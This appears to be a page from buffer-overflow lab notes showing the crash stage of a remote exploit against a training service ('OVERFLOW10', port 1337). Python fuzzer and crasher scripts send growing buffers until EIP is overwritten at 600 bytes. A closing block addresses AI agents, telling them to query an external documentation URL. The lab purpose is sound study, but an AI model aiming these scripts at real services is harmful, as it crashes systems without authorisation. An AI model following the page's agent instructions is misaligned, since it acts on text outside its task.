# Crashing the Application

## Fuzzing the Application

This step can be skipped for some applications as we already know the buffer size that causes the crash.

### Fuzzer.py

```
#!/usr/bin/env python3

import socket, time, sys

ip = "windows.box"

port = 1337
timeout = 5
prefix = "OVERFLOW10 "

string = prefix + "A" * 100

while True:
  try:
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
      s.settimeout(timeout)
      s.connect((ip, port))
      s.recv(1024)
      print("Fuzzing with {} bytes".format(len(string) - len(prefix)))
      s.send(bytes(string, "latin-1"))
      s.recv(1024)
  except:
    print("Fuzzing crashed at {} bytes".format(len(string) - len(prefix)))
    sys.exit(0)
  string += 100 * "A"
  time.sleep(1)
```

### Fuzzing

```
python3 fuzzer.py
```

![](/files/-Mdc73K-bI19oZnpNySF)

![](/files/-Mdc75hr77UlmxOd4_VD)

The fuzzer tells us that the program crashed when**`600 bytes`**was sent in as the buffer size. We also notice that the `EIP` has been overwritten with **`\x41`**.

## Crashing the Application

This step can be used to verify the value from the fuzzing process.

### Crasher.py

```
#!/usr/bin/python
import socket

try:
    print ("\nSending evil buffer...")
    
    prefix = "OVERFLOW10 "
    buffer = prefix + "A" * 600

    s = socket.socket (socket.AF_INET, socket.SOCK_STREAM)

    s.connect(("windows.box", 1337))
    s.send(buffer)

    s.close()

    print ("\nDone!")
  
except:
    print ("\nCould not connect!")
```

### Crashing

```
python crasher.py
```

![](/files/-Mdc88DqFKwBpqjqqLxU)

![](/files/-Mdc8BLYsR6crFukWDd_)

Once `Crasher.py` is ran, notice that the target application crashes and the `EIP` is overwritten with **`\x41`**. This confirms that **`600 bytes`** is indeed the buffer size that causes the target application to crash.


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://repo.4pfsec.com/buffer-overflow/remote-buffer-overflow/crashing-the-application.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.